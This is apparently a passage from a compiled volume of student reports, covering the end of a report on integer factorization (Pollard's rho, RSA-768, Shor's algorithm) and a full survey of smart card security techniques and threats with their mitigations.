Core Ideas. The main idea in Pollard’s % algorithm is to generate two random
numbers (0 ≤ x, y < n) by using a cyclic function, and hope their difference
divides
√n. The key observation is that, according to the birthday paradox, only
1.18 · n numbers have to be tested before finding a potential factor of n with
a probability of 0.5. This algorithm may fail to find factors for a composite n.
This happens since the random function image may not cover the whole interval
[0, n[. In that case, the algorithm is repeated with another function than the
usual
f (x) = x2 + 1.
(17)
It has also to be noted that the algorithm fails on prime numbers, since (|x−y|, n)
is always equal to 1 in that case.
Implementation in Python.
def pollardFactorization(n):
f = lambda x: x**2 + 1
def gcd(a, b):
105
if b == 0:
return a
else:
return gcd(b,
a%b)
def pollardFactor(n):
x = 2
y = 2
z = 1
while
x
y
z
z
=
=
=
== 1:
f(x)
f(f(y))
gcd(abs(x-y),
n)
return int(z)
m = pollardFactor(n)
n = int(n/m)
return [m, n]
Running √
Time. Pollard’s %-algorithm has a complexity and standard derivation of O( n) or O(2m/2 ) where m is the number of bits in n, when a random
mapping function is used. [13]
Improvements. Several improvements to this factorization algorithm have
been proposed over the years. They include different methods for cycle detection
and not computing z at every iteration. [14]
6.5
Other Algorithms
All the presented algorithms are so-called special-purpose factoring algorithms. This means that their running time does not depend solely on the
size of the integer to be factored. Their actual running-time may depend on
the size of the number’s factors (Trivial, Fermat, Pollard’s %), algebraic properties (Pollard’s % − 1), or other properties. Elliptic curve factorization is another
well-known sub-exponential special-purpose factoring algorithm. [15] Inversely,
general-purpose factorization algorithms depend uniquely on the size of
the integer to be factored. These algorithms are the ones used in practice when
trying to factor integers from RSA-crypto-systems. The general number field
sieve is currently the fastest algorithm from this category when factoring large
integers (typically above 100 digits).
106
7
7.1
Conclusion
Current State of the Art
In 2009, a team of researchers managed to a factor a 768 bits number (232
digits), using a cluster of PlayStation 3 over 2 years.[16] The number was known
as RSA-768 and was proposed by the RSA Laboratories as part of a challenge.
However, the challenge was canceled in 2007. It is still today the largest RSAnumber factored. Though this number was factorized, the security of the RSA
systems are not compromised, as it would take the same amount of time to factor
for any other number of that size that would be used for RSA. Moreover, the
recommended size of numbers used for RSA is increasing with time.
7.2
Peek at the Future
With the emerging quantum computers, the integer factorization could become
a much simpler problem. In fact, there already exists an algorithm running in
polynomial time on a quantum computer that computes the prime factors of any
given number. This algorithm is known as the Shor’s algorithm.[17]
In 2001, the number 15 was factored on a quantum computer using the Shor’s
algorithm by researchers from IBM-Almaden and Stanford University.[18]
Factoring this small might seem a derisory achievement, but in fact it is a
major milestone in the field. It proves the feasibility of quantum computer and
Shor’s algorithm in practice. If researchers find a way to increase the scalability of
quantum computers, the end of most crypto-systems as RSA would be inevitable.
7.3
Final Words
As we have seen throughout this report, the integer factorization is a very interesting problem, of great importance in various fields such as cryptography and
complexity theory. It is also the perfect problem for quantum computers to work
on. But most of all, the problem has practical life implications. Any efficient way
to practically compute the prime factors of a huge number would have gigantic effects, as a huge number of systems relies on the difficulty of factoring big
numbers for their security!
References
1. Oystein Ore. Number Theory and Its History. Courier Dover Publications, 1988.
2. G. Bisson. Factorisation d’entiers, 2011.
3. Kenneth H. Rosen. Discrete mathematics and its applications. McGraw-Hill,
Boston, 5th edition, 2003.
4. Joseph J. Rotman. First Course in Abstract Algebra. Prentice Hall, 2005.
5. N. Bourbaki. Éléments d’histoire des mathématiques. Masson, 1984.
6. S. Büttcher. Cryptography and security of open systems, factorization of large
integers. Ferienakademie, 2001.
107
7. W. Stein. Elementary number theory: Primes, congruences, and secrets. 2011.
8. Micheal Sipser. Introduction to the Theory of Computation. Course Technology,
2005.
9. Alan Cobham. The intrinsic computational difficulty of functions. In Y. BarHillel, editor, Logic, Methodology and Philosophy of Science, proceedings of the
second International Congress, held in Jerusalem, 1964, Amsterdam, 1965. NorthHolland.
10. Manindra Agrawal, Neeraj Kayal, and Nitin Saxena. PRIMES is in P. Annals of
Mathematics, 2:781–793, 2002.
11. John D. Lipson. Newton’s method: a great algebraic algorithm. In Proceedings of
the third ACM symposium on Symbolic and algebraic computation, SYMSAC ’76,
pages 260–270, New York, NY, USA, 1976. ACM.
12. R. Lehman. Factoring large integers. Mathematics of Computation, 1974.
13. B. Luders. An analysis of the complexity of the pollard rho factorization method.
2005.
14. R. P. Brent. An improved Monte Carlo factorization algorithm. 1980.
15. H. W. Lenstra Jr. Factoring integers with elliptic curves. The Annals of Mathematics, 1987.
16. Thorsten Kleinjung, Kazumaro Aoki, Jens Franke, Arjen Lenstra, Emmanuel
Thomé, Joppe Bos, Pierrick Gaudry, Alexander Kruppa, Peter Montgomery,
Dag Arne Osvik, Herman te Riele, Andrey Timofeev, and Paul Zimmermann. Factorization of a 768-bit RSA modulus. Cryptology ePrint Archive, Report 2010/006,
2010.
17. Peter W. Shor. Algorithms for quantum computation: Discrete logarithms and
factoring. In FOCS, pages 124–134. IEEE Computer Society, 1994.
18. Lieven M. K. Vandersypen, M. Steffen, G. Breyta, C. S. Yannoni, M. H. Sherwood,
and I. L. Chuang. Experimental realization of Shor’s quantum factoring algorithm
using nuclear magnetic resonance. Nature, 414(quant-ph/0112176):883–887, 2001.
108
Smart Card Security: A Study into the Underlying
Techniques Deployed in Smart Cards
Clement Tan, Qi Lin Ho, Soo Ming Poh
Abstract. This paper explores the techniques used with smart cards, broadly
categorized into contact smart cards and contactless smart cards. For each
technique, the underlying methods are outlined with their strengths and
weaknesses evaluated. Potential threats of smart cards are also discussed
together with the solution provided to counter these security issues threatening
smart cards. The paper concludes by investigating the possible future of smart
cards and the upcoming technology of Near Field Communication.
1
Introduction
Smart card has been one of the most remarkable inventions within the Information
Technology (IT) sphere. Smart card was first invented in 1968 and was commercially
practiced in France in 1983 as telephone card for payment for the use of public pay
phones [1]. After the successful mass use of the cards, memory concept was
incorporated into the cards. More researches were then performed and this lead to the
development of microprocessor smart cards.
Smart cards can be categorized into two general forms: (1) Memory and
Microprocessor; (2) Contact and Contactless. In the former category, memory smart
cards only store data. Microprocessor smart cards not only store data but also allow
the addition, deletion and modification of data stored within the memory. In the latter
category, physical interaction with card readers/terminals will be required for contact
smart cards to work. On the other hand, contactless smart cards eliminate the need of
physical contact with terminal due to an embedded antenna within the card which
allows communication to take place.
Due to the many benefits smart cards have brought to people; this includes
convenience and ease of use, popularity with smart cards has been increasing
tremendously. At present, smart cards are used in application areas such as: (1)
financial, e.g. credit cards, debit cards; (2) mass transit, e.g. EZ-Link cards; (3)
identification, e.g. biometric cards; (3) healthcare, e.g. health insurance cards; (4)
telecommunications, e.g. SIM (Subscriber Identification Module) cards.
This paper will be focusing mainly on the Contact and Contactless smart cards.
The rest of the paper is organized as follows; the next section gives an introduction of
Contact and Contactless smart cards, their underlying security techniques and
potential threats associated. Section 3 covers the comparison of each security
techniques. Section 4 discusses about the future of smart cards and finally paper will
conclude at Section 5.
109
2
Contact Smart Cards
Contact smart cards are cards embedded with an integrated circuit chip (ICC) that
contain either just purely memory or a combination with a microprocessor. As its
name suggests, contact smart cards have to be inserted into a smart card reader in
order to establish a direct connection for the transfer of data [2]. Contact smart cards
are identified with a small yet obvious gold connector plate measuring approximately
one square centimetres located at a corner of the card. Some examples of contact
smart cards include Cash Cards, Credit Cards, Debit Cards and even SIM (Subscriber
Identification Module) cards utilized in mobile phones.
2.1
Security Techniques Implemented in Contact Smart Cards
EMV (Europay, MasterCard and VISA) technology sets the specifications established
in support for the replacement of the metallic strip for chip technology on contact
smart cards. With the introduction of EMV specifications, global interoperability can
be assured between contact smart cards and its card readers [3]. More importantly,
EMV also enhances the security level in three main areas of concern in a contact
smart card transaction: card authentication, cardholder verification and transaction
authorization [4].
Card Authentication. To prove the genuineness of contact smart cards and enhance
protection against from counterfeits, three techniques are made available. These
include Static Data Authentication (SDA), Dynamic Data Authentication (DDA) and
Combined DDA with Application Cryptogram Generation (CDA). During a payment
transaction, the card chip and the terminal agree to perform either SDA, DDA or
CDA. Only one method of offline data authentication is performed for a particular
transaction.
Static Data Authentication. SDA makes use of a symmetric key encryption technique
whereby both the card and bank have a same shared secret key. This key is required to
verify the Cryptographic Check Value (CCV) stored in the card during
personalization [5]. It must be noted that the verification of card will only be reached
when the bank assures it. The issue relating to SDA is that the card can only be
proven to be genuine if terminal is online. In the case of an offline terminal, the card
cannot be validated straight away. What offline terminal does is only recording the
response provided by card during authorization and sending it to the bank when there
is connection. With this shortcoming, it gives SDA chip cards a disadvantage since
they are perceived to be even less secure than magnetic strip cards if an offline
terminal is used (i.e. one that will never have any connections).
Dynamic Data Authentication. DDA is a technique more secured than SDA. Instead
of utilizing a single shared secret key, DDA stores an encryption key which allows for
offline data authentication in which the card uses public key technology to generate a
cryptographic value, which includes transaction-specific data elements, that is
validated by the terminal to protect against skimming [6], a feature SDA is unable to
110
provide. In addition, the card generates a new cryptographic value each time a new
transaction is performed. Therefore, DDA is perceived to be a stronger form of card
authentication since the attackers will not be able to acquire the private key on the
chip card just by reading the card [7].
Combined DDA with Application Cryptogram Generation. CDA provides the
underlying techniques of a combination of both SDA and DDA. In the case of
utilizing CDA, not only the genuineness of cards can be validated, a special
performance of determining whether data within the cards have been altered since
personalization. In this way, the malicious act of programming offline terminals
through use of counterfeit cards can be avoided [8].
Essentially, all three techniques for card authentication employ RSA (Rivest,
Shamir, and Adleman) public key cryptography.
Card Verification. To prove the genuineness of owners and protect against lost
and/or stolen cards, four types of card verification methods (CVM) are used. Online
PIN, Offline PIN, Signature and No CVM required.
Online PIN. For this technique of card verification, users enter their PIN which will
be encrypted with Triple DES Data Encryption Standard (3DES) and then transported
to the issuer, the bank, for verification purposes [9].
Offline PIN. In the case of offline PIN, the PIN entered by users is compared with the
pre-assigned PIN value in the card. In addition, there exists an offline counter which
allows the offline PIN to be blocked when a certain incorrect attempts of PIN have
been entered [10].
Signature. Cardholder owners will be required to physically provide a signature in
order to ensure the genuineness of being the owner. An advantage of using signature
as a form of verification is that there is certain level of difficulty in forging signatures;
however this does not mean there are no cases of signature forging. On the other
hand, this verification method will require a human to be around to check the
signature with the one on the card to determine its genuineness [11].
No CVM Required. This verification method can be said to be the most dangerous
form since if no CVM is required, there will actually be no need for a verification
process. The only advantage of this money is the fluency of transactions [12].
Transaction Authorization. To prove that a transaction is genuinely initiated by the
users, transaction will be needed to be authorized by these users. The process, Online
Mutual Authentication (OMA), will include using Authorization Request Cryptogam
(ARQC) and Authorization Response Cryptogram (ARPC). Contact smart cards will
produce an ARQC to the terminal, i.e. card reader, then to the issuer (bank) when a
transaction is initiated. Only when the verification is successful will the issuer return
111
an ARQC to the card. The card will then return a Transaction Certificate to proceed
with the transaction.
3
Contactless Smart Cards
The contactless smart cards employ a radio frequency between the Proximity IC Card
(PICC) and the Proximity Coupling Device (PCD) without physical insertion of the
card into the reader. As seen in Fig. 1, this is made possible as the PICC contains an
integrated chip and an inductive antenna coil embedded within the card. An
alternating current passes through the PCD antenna and creates an electromagnetic
field, which induces a current in the PICC antenna. The PICC then converts this
electromagnetic field into a DC voltage to power the PICC‟s internal circuits. The
maximum proximal distance possible for transmission would be determined by the
configuration and tuning of both antennas in PICC and PCD.
Fig. 1. PCD and PICC Configuration
These contactless smart cards are used in situations where quick transactions are
necessary, whenever the cardholder is in motion at the moment of the transaction.
Many contactless readers are designed specifically for cashless payment, physical
control, identification systems and transportation applications [13].
3.1
Security Techniques Implemented
Triple Data Encryption Standard. Triple DES takes three 64-bit keys, for an overall
key length of 192 bits. The Triple DES DLL then breaks the user provided key into
three subkeys, padding the keys if necessary so they are each 64 bits long. The data is
encrypted with the first key, decrypted with the second key, and finally encrypted
again with the third key. Triple DES runs three times slower than standard DES, but is
112
much more secure if used properly. The procedure for decrypting something is the
same as the procedure for encryption, except it is executed in reverse. Like DES, data
is encrypted and decrypted in 64-bit chunks [14].
Advanced Encryption Standard. AES is a symmetric block cipher that encrypts and
decrypts 128-bit blocks of data. The algorithm consists of 4 stages that make up a
round which is iterated 10 times for a 128-bit length key. The first stage “SubBytes”
transformation is a non-linear byte substitution for each byte of the block. The second
stage “ShiftRows” transformation cyclically shifts (permutes) the bytes within the
block. The third stage “MixColumns” transformation groups 4-bytes together forming
4-term polynomials and multiplies the polynomials with a fixed polynomial mod
(x4+1). The fourth stage “AddRoundKey” transformation adds the round key with the
block of data [15].
RSA Signature. RSA is a public key cryptosystem for both encryption and
authentication. It is an encryption algorithm that uses very large prime numbers to
generate the public key and the private key. RSA is typically used in conjunction with
a secret key cryptosystem such as DES. DES would be used to encrypt the message as
a whole and then use RSA to encrypt the secret key [16].
Elliptic Curve Cryptography (ECC). ECC is a public key cryptography. “Domain
parameters” in ECC is a predefined constants to be known by all the devices taking
part in the communication between the sender and the receiver. ECC does not require
any shared secret between the communicating parties but it is much slower than the
private key cryptography. The mathematical operations of ECC are defined over the
elliptic curve y2=x3+ax+b, where 4a3+27b2≠0. Each value of the „a‟ and „b‟ gives a
different elliptic curve. The public key is a point in the curve and the private key is a
random number. The public key is obtained by multiplying the private key with the
generator point G in the curve. The generator point G, the curve parameters „a‟ and
„b‟, together with few more constants constitutes the domain parameter of ECC [17].
4
4.1
Comparison across Smart Card Security Techniques
Evaluation of Security Techniques in Contact Smart Cards
In this section, an analysis on the security techniques employed in Contact Smart
Cards will be done. This analysis includes the strengths (i.e. benefits) and weakness
(i.e. potential threats) for each underlying techniques. In addition to this analysis,
suggested solutions or mitigations will be provided.
Card Authentication.
Static Data Authentication. The main reason why SDA is used in the Card
Authentication process is mainly due to its low implementation costs. It is generally
113
much cheaper to deploy SDA rather than DDA. The reason behind this low cost is
because SDA does not require public key cryptographic processing. Without this
process, there will not be a need to use cards that comes with a public key
cryptographic processor. Therefore the lower cost [18].
As the saying „You get what you pay for‟, with a cheaper technique, there is bound
to be weaknesses. As mentioned earlier, SDA requires a terminal that is online in
order to validate the genuineness of the card. An attacker can launch an attack by
simply making use of an offline terminal. For example, an attacker skims/clones a
genuine card to produce a counterfeit card to use on an offline terminal. What he
needs to do is just to program the card in such a way that it will agree to whatever PIN
he enters [19]. And there he goes, the transaction or rather, the attack will be
successful.
Skimming and Cloning. Information on a card can be recorded when a user uses his
card on a machine which has skimmer devices attached. PIN entered by users will be
captured using a capturing device. After all these have been done, the unauthorized
user will make a duplication of the card by cloning all information. Since
unauthorized user now has a cloned card and PIN, he will be able to make himself
authorized for any transactions.
In order to lower the risk of skimming and cloning leading to production of use of
counterfeit cards, additional properties such as data locking and tamper resistance can
be included. For the former suggestion, data within the card can be locked so that
attacker will not be able to retrieve the data found in the card. For the latter
suggestion, data within card can be encrypted so that even if attacker found ways of
retrieving data within the card, they will not be able to decipher the data. In this way,
it will be much more secured.
Dynamic Data Authentication. As one of the means to mitigate the threat faced by
SDA, Dynamic Data Authentication is being used. As mentioned in the previous
section, the combination of an encryption key together with the public key technology
makes DDA a more secured authentication method since card data can be
authenticated and validated. DDA also include additional security features such as
secure key storage and tamper resistance which prevent counterfeiting of cards [20].
However, with this additional security features, cards which are integrated with
public key cryptographic processor will be required. Therefore, this explains the high
costs for the use of dynamic data authentication as compared to static data
authentication technique. In addition, DDA is not foolproof; there is also possibility
for „wedge‟ attack to take place. Since card authentication takes place before PIN
verification, a stolen card can be exploited without knowing the correct PIN [21]. As
shown in Fig. 1 below, an electronic device as a "man-in-the-middle" or “wedge” can
manipulate the messages flowing between the terminal and card which will interfere
with the card verification process.
114
Fig. 2. Variation of a Man-in-the-Middle Attack/“Wedge” Attack on a Contact Smart Card [22]
A suggested solution will be to allow both card authentication and card verification
processes to take place simultaneously. By doing so, the risk of “Wedge” attack can
be moderated. It will be seen later that another form of authentication method
(Combined DDA with Application Cryptogram Generation) technique is able to
perform such function.
Combined DDA with Application Cryptogram Generation. Facing with the threat of
„Wedge‟ attack in DDA technique, a later variant of card authentication technique
CDA is introduced. CDA is able to partially solve the issued faced by DDA since
CDA allows card authentication and PIN verification both at the same time.
However, due to the lack of interoperability (i.e. it may not work with terminal of
older versions). CDA does not receive as much popularity as compared to DDA [23].
CDA is actually considered to be a very secured authentication method, therefore,
interoperability issues should be dealt with in order to receive higher feedbacks.
Card Verification.
Online PIN Verification. Online PIN method has high level of security given the fact
that it is encrypted with Triple DES Data Encryption Standard when transported to the
issuer for verification. With issuer‟s verification, it can be certain that card
verification can be achieved with minimum threat.
Offline PIN verification. This method of card verification provides higher level of
security given the fact that it contains an offline counter which will block the use of
offline PIN when a certain incorrect attempts of PIN have been entered. As illustrated
115
in Fig. 2, chip will decrease PIN Try Counter by one when an incorrect PIN is
entered. When it reaches zero, the card will be blocked and user will need to go down
to the issuer to re-activate the card. This protection can also be a double-edge sword.
What if a genuine cardholder forgets his PIN. The blockage of the use of card will
now be seen to be an annoyance since he will need to re-activate his card in order to
use it.
Fig. 3. Offline Pin Verification Process [24]
Signature. This method of card verification provides ease of use to users. Apart from
eliminating the need to remember PINs (assuming each card is given a different PIN),
signature is very personal. This means that only the genuine owner will know the
exact way of signing the signature. However, forging of signature is not 100%
impossible. Since signature can be found on the back of the card, anyone who has
picked up a signed card can learn to forge the signature. On top of that, it is often seen
that merchants do not always check the signature signed with the one on the card.
This will place signature card verification method at a higher risk in terms of security.
Indeed PIN and Signature verification methods do have their own advantages;
however they do possess certain inevitable threats. The former is prone to „PIN
stealing‟. This means that PIN entered onto a terminal can be observed by „shoulder
surfing‟. As for the latter, it has been mentioned that it is prone to forging cases. As a
result, PIN and Signature verification methods can be seen to be as insecure. Reported
in an article, 63% of consumers will prefer fingerprint as a form of card verification
116
over PIN and Signature [25]. In the future, it may be possible that fingerprint
verification will take over the other verficiation method. This is highly doable since
fingerprint is a one form of biometric capable of identifying individual. In addition,
no two persons can have identical fingerprints. Hence, in this way, it can reach an
even higher level of security eliminating the threats of „PIN stealing‟ and forging.
EMV Technology as a Whole. The above provides specific analysis of individual
security techniques. As we can see, EMV Technology is considered to be highly
secured. However EMV is still not foolproof. A prominent example of potentials
threat faced by contact smart cards is the Middleperson Attack (Relay Attack).
Middleperson Attack (Relay Attack) [26]. Given you are at a restaurant having lunch.
At the end of the meal, you pay $50 for with your VISA card. However, at the end of
the month, you found out you have paid for $500 instead of the $50 for the meal.
What has actually happened?
Fig. 4. Man-in-the-Middle Attack on a Contact Smart Card [27]
The above example is one form of middleperson attack or relay attack. The Point
of Sale (POS) terminal that used to make the payment has been tampered with. Just
when you were about to enter your PIN onto the POS terminal, the waiter at the
restaurant had informed his accomplice to get ready for the „attack‟. He first inserts a
fake card into a POS terminal at another store. As soon as you enter your PIN, the
PIN will be transmitted wirelessly to the card and accomplice who then enters the PIN
he has received and successful attack had just been launched. The attackers have just
used your account to pay for their items at another store.
4.2
Evaluation of Security Techniques in Contactless Smart Cards
In this section, an analysis on the security techniques employed in Contactless Smart
Cards will be done. This analysis includes the strengths (i.e. benefits) and weakness
117
(i.e. potential threats) specific to the contactless smart card technology. In addition to
this analysis, suggested solutions or mitigations will be provided.
Potential Threats of Contactless Smart Cards [28]. The main difference between
contact and contactless smart cards lies in the process where information is
transmitted between the card and the reader. In the case of the contactless smart card,
the card does not need to be inserted and be in direct contact with the reader. This
creates opportunities for potential threats due to the contactless transmission of data,
thereby creating threats specific to contactless smart cards.
Eavesdropping. The absence of a medium between contactless smart card and the
reader provides convenience and easy access to intercept and change data that is being
transmitted over the air. This allows for eavesdropping that is a common threat which
exploits the largest weakness of contactless transmission of information. Hackers are
able to eavesdrop and alter the data which was being transferred. In the passive
setting, hacker may learn useful or confidential information by triggering a response
from the card at a distance, with the user unaware of it. On the other hand, in the
active setting, man-in-the-middle attacks are facilitated. A hacker can replace a few
blocks of data which were initially transferred to the blocks of data he wants. For
these reasons, it is important to stress that encryption of the data being exchanged and
mutual authentication are compulsory in most cases.
Interruption of Operations. The other threat contactless smart card face is that of
interruption of operations. Due to the weakness of contactless smart card moving in
the electromagnetic field, the data transmission between the reader and the card may
be interrupted at any moment without the user's notice. This results in the user
moving his smart card out of the electromagnetic field without even realizing it.
Therefore, the system needs to ensure that transactions are completed successfully
without any miscommunication of data. Thus, reliable backup mechanisms need to be
implemented and back-dated data should be available whenever possible.
Denial of Service. This common type of attack within the computer network may also
occur in contactless smart cards. This attack can be done via the owner of the card, or
by the hackers within close proximity. The former would be carried out when users,
for some reason, want to redeem a new functional card from the issuer free-of-charge.
The latter would be performed when monetary units could be debited from the card at
close proximity, thus denying the user access to the service he had purchased for. The
information within the contactless smart cards can be deleted or destroyed complete
using inappropriate electromagnetic waves.
Covert Transactions. The most important difference between contact and contactless
smart cards lies in the fact that the user does not notice whether a fake reader is
entering into a communication with the card he is holding. Therefore the biggest
threat for contactless technology is represented by covert transactions in which
fraudulent merchants communicate with the user‟s card, triggering fake transactions
using fake readers. Such merchants could potentially process a number of transaction
with a smaller amount, or even from a distance debit all monetary units contained on
118
the card. A sound approach to protect against this attack strategy is strong mutual
authentication between the card, the reader and the user, possibly relying on
certificates, and requiring some kind of user interaction. For example, a user could be
prompted to push a button on his card or to apply some similar mechanism whenever
a transaction is performed. In any case, the system must assist the user to only accept
legitimate transactions.
Other types of attacks. Physical attacks on the chip hardware, for example, by
microelectronic probing as well as so called side-channel attacks, in which the
opponent simply monitors the electrical activity of the chip and tries to turn seemingly
unrelated power, time or electromagnetic emanation measurements into meaningful
information. These kinds of attacks are new types of side-channel attacks against
contactless technology have recently emerged. These have proven quite successful in
recovering secret information from the card, given very limited resources, if no
specific countermeasures are implemented.
Security in 3DES. The use of the 3DES algorithm to calculate Cryptographic Check
Values (CCV). The primary purpose of the CCV is to provide a data integrity function
that ensures that the message has not been manipulated in any way. This includes the
alteration, addition and deletion of data. The essential security of smart cards data
transmission can be achieved by the use of sequence numbers which are incorporated
within the CCV. The CCV also supplies some assurance of source authentication
depending on the key management architecture. However, the CCV does not provide
the property of non-repudiation. It is almost impossible to prove whether the message
to a third party is authentic as the receiver has the same secret key as the sender and
has the ability to create a new message or to modify an existing message [29].
Security in RSA. It is relatively easy to generate an apparently authentic copy of a
digital signature since no evidence is present to prove the authenticity of the digital
signature. Source authenticity or non-repudiation cannot be checked as the
authenticity of the keys cannot be proven. Therefore there is a need to create
additional steps to be assured of the authenticity of the senders‟ public key [30].
5
5.1
Related Work: Future of Smart Cards
More extensive use of smart cards in various industries and practices
Smart cards have now integrated of our daily lives as we rely heavily on the
technology to pay for our transport fares, enter our offices, access our computers at
work and even to get a snack from the vending machine.
Consumer research has revealed that nearly 80 percent of consumers surveyed
believe that smart cards will be an important part of their everyday life and more than
three-quarters are largely attracted to smart cards which will be able to consolidate
payment functions and store personal data on the same card. Smart cards also have the
potential to become lifestyle cards, holding a range of applications chosen by the
cardholder [31].
119
Most of the smart card systems in use today each serve only a single purpose and
are related to just one process or hardwired to only one application. A smart card
cannot simply justify its existence in this respect and the approach of the future smart
card is therefore towards designing multi-application cards with an operating system
based on an open standard that can perform a variety of functions [32].
At the Personal Level. At the personal level in the near future, we foresee smart
cards to be configurable and able to handle multiple tasks selected by their owners.
From providing access into company networks, enabling electronic commerce, storing
personal health records, providing ticketless airline travel and car rentals, to offering
electronic identification for accessing government services just to name a few [33].
The ultimate goal of which would be to carry fewer cards but gain greater
convenience and faster access to a wide array of information.
At the Corporate Level. At the corporate level there too exists a growing trend in the
adoption of smart card and card reader systems by companies and corporations across
various industries.
For instance, hospitals utilize smart card technology to ensure more timely and
secure dispensing of medicine to patients. A medicine cabinet would be fitted with a
reader technology and then wirelessly connected to software that links up personal
dosage information stored on an RFID wristband. Hence if a patient is required to
take one tablet at six o‟clock in the morning, the software will communicate with the
cabinet to indicate that the patient needs to access their medicine. The patient then
presents his wristband to the cabinet reader, allowing access to their prescribed
medication at the correct time [34].
Smart card technology is also getting attention from the fleet management sector,
where RFID is already being installed in rental cars. The idea is that a rental car could
be parked on the street corner and is accessed simply by presenting an RFID-enabled
card to a reader installed within the window screen. HID Global, a trusted leader in
providing access control and secure identity solutions, including secure card issuance
and RFID technology, is working with some major car rental companies interested in
leveraging the benefits of this technology to streamline the management of their fleets
[35].
5.2
Possibility of Replacement by NFC-Enabled Smart Phone Devices
With a wide and growing number of industries finding utility for smart cards in their
operations, coupled with the increasing popularity and adoption of smart phones,
there lies a huge possibility of integrating over and smart card functionalities into
smart phones. This would serve to fulfill the requirements of a multi-function smart
card while reducing the need for another physical card containing a microprocessor
chip.
At least in the local context, such a scenario may soon become reality when
consumers here are allowed to tap and pay for their purchases at more than 20,000
120
retail points and taxis from the middle of 2012 with Near Field Communication
(NFC) technology on a smart phone.
NFC is a short-range wireless communication technology capable of bidirectional
data transfer which allows mobile phones and NFC readers to communicate and
conclude transactions within a 4-cm distance, operating in the HF frequency band at
13.56 MHz [36].
When launched in 2012, the deployment focus of NFC technology will be on retail
payment but it will be extended to uses for loyalty schemes, ticketing and gift
vouchers within two years. Discussions will be held with the Land Transport
Authority to plan for the rollout of NFC mobile payment for transit in early 2013 [37].
Merchants need not install new devices to accept mobile payment from NFC phones,
those that currently accept contactless payment cards from MasterCard, Visa or
CEPAS will be able to use the same device to accept such payment [38]. Such has
already been utilized in certain parts of Europe and Asia, such as South Korea and
Japan.
6
Conclusion
The use of smart cards has provided convenience and ease of use to different
individuals and entities. But as discussed in this paper, there are several security
concerns and potential threats which users and developers have to be aware of.
Developers have to be aware of and guard smart card systems against attacks and
potential threats from hackers. These security measures include cryptographic
algorithms, digital signature and key management which will possibly allow for
authentication, maintain data integrity, provides confidentiality and non-repudiation.
In the case of the contact smart card technology, the card authentication,
verification process and transaction authorization are of utmost importance as these
areas are where hackers are likely to attack. Measures such as Static Data
Authentication, Dynamic Data Authentication and Combined DDA with Application
Cryptogram Generation have been used to check for card authentication. On the other
hand, password-related mechanisms like PIN number and signature are required for
card verification. Lastly for the transaction authorization, authorization request and
response cryptograms are implemented to ensure that transactions are genuine and
successful.
Due to a lack of medium in contactless smart card technology, the security in the
process of information transmission is critical for protecting the user. This creates
opportunities for potential threats such as eavesdropping, denial of service and covert
transactions. Developers have the responsibility to prevent these attacks from
happening with various forms of security mechanisms as described previously.
With the pervasive use of smart cards in various aspects of our lives, smart cards
have become a necessity which provides us with extensive convenience. We foresee
smart cards to be configurable and able to handle multiple tasks selected by the users.
Many different industries and companies have brought the use of smart cards to brand
new levels which include incorporating it with medicine dispensers and rental cars
121
access. Lastly, there also lies a new possibility of integrating smart card
functionalities into smart phones using Near Field Communication. The motivation
being that a single smart phone is able to replicate the capabilities of numerous smart
cards. This upcoming technology could therefore possibly pose a huge threat to smart
cards and bring with it future studies into other security principles, techniques and
issues to do with NFC.
References
1. Smart card: Invented here, http://www.nytimes.com/2005/08/09/world/europe/09ihtcard.html
2. Durability of Smart Cards for Government eID,
http://www.datacard.com/downloads/ViewDownLoad.dyn?elementId=repositories/downloa
ds/xml/govt_wp_smartcard_durability.xml&repositoryName=downloads&index=8
3. Smart Card Alliance. EMV: Frequently Asked Questions,
http://www.smartcardalliance.org/pages/publications-emv-faq#q15
4. Smart Card Alliance. EMV: Facts at a Glance,
http://www.smartcardalliance.org/resources/pdf/EMV_Facts_081111.pdf
5. Chip and Pin, http://www.smartcard.co.uk/Chip%20and%20PIN%20Security.pdf
6. VISA. Chip Terms Explained. A Guide to Smart Card Terminology, http://www.visaasia.com/ap/center/merchants/productstech/includes/uploads/CTENov02.pdf
7. Cotignac. Blog. EMV Offline Data Authentication,
http://cotignac.co.nz/blogs/11December2008.html
8. e-EMV: Emulating EMV for Internet payments using Trusted Computing technology,
http://digirep.rhul.ac.uk/file/03ef906a-ba3d-6978-8202-864e1a5f9942/1/RHUL-MA-200610.pdf
9. VISA. General PED Frequently Asked Questions,
http://www.secureretailpayments.com/resources/visa-ped-faq.pdf
10. VISA. General PED Frequently Asked Questions,
http://www.secureretailpayments.com/resources/visa-ped-faq.pdf
11. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods
12. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods
13. EMV Contactless Communication Protocol-News-Cards Tech & Security, http://www.ects.net/en/article.asp?/41.html
14. Strong Encryption Package, Triple DES Encryption,
http://www.tropsoft.com/strongenc/des3.htm
15. Advanced Encryption Standard (AES), http://www.vocal.com/cryptography/aes.html
16. KEY-BASED ENCRYPTION: Rivest Shamir Adleman (RSA),
http://library.thinkquest.org/27158/concept2_4.html
17. Elliptic Curve Cryptography. An Implementation Tutorial, http://www.reverseengineering.info/Cryptography/AN1.5.07.pdf
18. How thieves bypass bank card Pins, http://www.thisismoney.co.uk/money/saving/article1614798/How-thieves-bypass-bank-card-Pins.html
19. Chip and Spin, http://www.chipandspin.co.uk/spin.pdf
20. 3-D Secure: A critical review of 3-D Secure and its effectiveness in preventing card not
present fraud, http://www.58bits.com/thesis/3-D_Secure.html#_Toc290908599
122
21. Defending against wedge attacks in Chip & PIN,
http://www.lightbluetouchpaper.org/2009/08/25/defending-against-wedge-attacks/
22. EMV PIN verification “wedge” vulnerability,
http://www.cl.cam.ac.uk/research/security/banking/nopin/
23. Defending against wedge attacks in Chip & PIN,
http://www.lightbluetouchpaper.org/2009/08/25/defending-against-wedge-attacks/
24. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods
25. 63% of Consumers Prefer Credit Card Verification by Fingerprint over PIN, Signature or
Photo, http://www.banktech.com/architecture-infrastructure/227900120
26. Chip and Spin! Examining the technology behind the “Chip and PIN” initiative,
http://www.chipandspin.co.uk/problems.html
27. Chip & PIN (EMV) Relay Attacks,
http://www.cl.cam.ac.uk/research/security/banking/relay/
28. Contactless Technology Security Issues, http://www.chipublishing.com/samples/ISB0903HH.pdf
29. Cryptography and Key Management, http://www.smartcard.co.uk/tutorials/sct-itsc.pdf
30. Cryptography and Key Management, http://www.smartcard.co.uk/tutorials/sct-itsc.pdf
31. My Money Skills. Is there a Smart Card in Your Future?
